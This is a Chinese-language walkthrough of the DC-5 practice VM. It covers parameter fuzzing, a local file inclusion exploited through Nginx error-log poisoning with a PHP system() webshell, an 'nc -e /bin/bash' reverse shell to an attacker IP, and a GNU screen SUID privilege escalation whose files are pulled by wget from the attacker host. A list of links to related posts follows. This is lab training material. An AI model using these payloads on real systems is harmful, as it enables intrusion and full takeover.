DC-5靶场下载及渗透实战详细过程(DC靶场系列)
目录
一. 信息收集
1. 主机扫描
2. 端口扫描
3. 目录扫描
4. 页面信息探测
二. 渗透过程
1. 寻找包含文件的参数
2. Nginx日志文件包含
3. 反弹shell
4. Linux提权
5. 找查flag
三. 收获总结
1. Nginx日志包含
2. 值得注意的事项
DC-5靶场下载地址https://www.five86.com/downloads/DC-5.zip
一. 信息收集
1. 主机扫描
2. 端口扫描
3. 目录扫描
扫描出了一个特别的
4. 页面信息探测
主页面没发现有啥,只知道用的中间件为Nginx
而这个页面,每次刷新版权标识年份都会随机变化
这个页面也是随机变化,出现这种情况,可能是因为传参为空而默认包涵了本地下的footer.php文件,所以考虑到本地文件包含漏洞,当然也可能只是PHP脚本随机的结果
二. 渗透过程
1. 寻找包含文件的参数
为了验证文件包含的猜想,这里利用burpsuite爆破配合参数fuzz拆解
fuzz连接,https://github.com/TheKingOfDuck/fuzzDicts
我这边也上传在csdn了,0积分免费下载
web渗透通用fuzz字典(小而精)-网络安全文档类资源-CSDN文库
burpsuite抓包
设置好Positions爆破参数
加载刚才下载的参数fuzz,开始爆破
爆破得到file参数
2. Nginx日志文件包含
先查看一下Nginx的配置,构造payload
http://ip/thankyou.php?file=/etc/nginx/nginx.conf
开启了访问日志(access_log)和错误日志(error_log),这里我们看一下错误日志
http://ip/thankyou.php?file=/var/log/nginx/error.log
得到了thankyou.php的目录,不难发现,传参错误的时候,会自动记录URL还有referer头在错误日志里,构造payload
/thankyou.php?mumua=<?php system($_GET[1])?>这里记得用burpsuite重复器抓包发送,用浏览器传参会自动将<>转换成URL编码导致php执行失败
接着尝试一下命令执行
/thankyou.php?file=/var/log/nginx/error.log&1=whoami
任意命令执行成功!!!
3. 反弹shell
构造payload
/thankyou.php?file=/var/log/nginx/error.log&1=nc -e /bin/bash 192.168.120.129 6666
反弹shell成功,升级为交互shell
python -c 'import pty; pty.spawn("/bin/bash")'
4. Linux提权
find / -perm -4000 -print 2>/dev/null
可以看到有两个特殊的命令,exim之前在DC-4的时候试过了,不能完全得到root权限,这里用screen作为突破口,用searchsploit工具搜索一下漏洞
searchsploit screen 4
将文件复制到桌面
cp /usr/share/exploitdb/exploits/linux/local/41154.sh /root/桌面/exp.sh开启http服务
python -m http.server 8888
接下来,我们以文本的形式打开exp.sh文件(因为靶机没有对应的命令,只能手工提取命令了)
根据提示,在桌面创建两个c文件
保存之后,在桌面打开终端,用gcc编译c文件
gcc -fPIC -shared -ldl -o libhax.so libhax.cgcc -o rootshell rootshell.c
编译完后,再将这两个c文件删掉,文本让我们用rm命令,我们也可以自己删,接着我们修改exp.sh文件内容
将1到36行的内容全部删除并保存,留下cd /etc后面的命令,接着在/tmp目录下,下载这三个文件
cd /tmpwget 192.168.120.129:8888/exp.shwget 192.168.120.129:8888/libhax.sowget 192.168.120.129:8888/rootshell
文件下载完后,赋予exp文件权限并执行exp.sh
chmod 777 exp.sh./exp.sh
提权成功
5. 找查flag
find / -name *flag.*
tac /root/this*
通过成功!!!
三. 收获总结
1. Nginx日志包含
①先查看配置文件,查看开启的日志
/etc/nginx/nginx.conf②错误日志跟访问日志目录
/var/log/nginx/access.log
#访问日志
/var/log/nginx/error.log
#错误日志③通过分析日志,包含木马
记得一定要用burpsuite进行测试,用浏览器会导致大于小于号被URL编码而无法正确识别PHP
2. 值得注意的事项
当目标靶机没有相关的命令时,可以自己分析sh文件,现在kali上完成一些重要的操作,然后手工提权
DC-5靶场下载及渗透实战详细过程(DC靶场系列)相关推荐
- DC-3靶场搭建及渗透实战详细过程(DC靶场系列)
目录 一. 信息收集 1. 主机扫描 2. 端口扫描 3. 目录扫描 4. web页面信息探测 二. 漏洞找查 1. joomscan 2. searchsploit 三. 漏洞利用 1. SQL注入 ...
- DC-1靶场搭建及渗透实战详细过程(DC靶场系列)
目录 一. 环境搭建 1. 准备工具 渗透利器kali DC-1靶场机 2. 安装过程 二. 渗透过程 1. 信息收集 ①探测目标IP地址 ②探测目标IP开放端口 ③网页信息收集 2. 漏洞查找与利用 ...
- 希尔排序的详细过程_算法系列: 10大常见排序算法(4)希尔排序
本课程是从少年编程网转载的课程,目标是向中学生详细介绍计算机比赛涉及的编程语言,数据结构和算法.编程学习最好使用计算机,请登陆 www.3dian14.org (免费注册,免费学习). 一句 希尔排序 ...
- 【网络安全】2022年第一次靶场渗透实战学习
一.介绍 渗透测试是通过模拟黑客或者骇客攻击,以评估计算机系统或者网络环境安全性的技术:主要的目的是进行安全性的评估,而不是摧毁或者破坏目标系统. 渗透测试所需要的基础技能必须有网络基础.编程基础.数 ...
- 暗月渗透实战靶场-项目六(上)
暗月渗透实战靶场-项目六 环境搭建 使用的是暗月提供的环境 直接虚拟机运行即可 设置网络环境 网卡配置的时候为了方便直接使用的是暗月的vm19的网卡配置的内网环境 00x1-信息搜集 我们已经知道目标 ...
- 全!CTF靶场、渗透实战靶场总结 (适合收藏)
CTF靶场.渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门.提升自己.丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯): 渗透实战靶场: ...
- DC-3渗透实战(详细过程)
目录 DC-3靶机 1.主机发现 2.端口扫描 3.网页信息探测 4.敏感目录扫描 5.漏洞查找和漏洞利用 漏洞查找 joomscan searchsploit 漏洞利用 sqlmap John 反弹 ...
- 红队渗透靶场之prime1.0(超详细!)
靶场考察知识 Wordpress WordPress是一个免费的开源内容管理系统(CMS),可以用来创建和管理网站或博客.它是由PHP语言和MySQL数据库构建的,并且拥有大量的插件和主题,可以让您轻 ...
- 【vulnhub】Lampiao渗透实战(脏牛提权)
总结 1.该靶机的WEB系统的建站CMS是drupal 7,时刻关注一些cms漏洞 2.在没有思路的时候,try yourself !往往有不同的收获 3.再练练脏牛提权... Lampiao靶机百度 ...
最新文章
- 技术网站 --入门无忧网
- 数据结构与算法基础-试题
- 腾讯Angel亮相VLDB,携全新Angel 2.0宣布加入LF深度学习基金会
- 406(浏览器接收的响应类型和服务器返回的响应类型不匹配)
- Linux加密框架 crypto 算法模板
- 谈谈Java虚拟机——Class文件结构
- 英语计算机职称考试查询成绩,北京职称外语计算机成绩长期有效
- 【推荐实践】爱奇艺推荐中台探索与实践
- 二分查找 —— 从三分支到二分支
- MyBatis源码阅读(二) --- 执行流程分析
- FOC:【2】SVPWM(七段式)的Verilog实现与仿真
- uniapp调用芯烨xprinter打印机安卓sdk
- 五百万微商都在用微信智能获客小程序,你还不加入?
- boost全平台编译方法
- 关于广告联盟的高价词问题
- 手机禁止安装app,刷机才能恢复
- CSS mix-blend-mode滤色screen混合模式
- APP兼容性测试---testin云测试平台
- DEV GridControl导入导出Excel文件 - 简单表格数据导入(Microsoft.Office自带)
- 小学计算机打字基础知识教案绿色圃,小学信息技术《键盘操作再加强—认识特殊键》教案...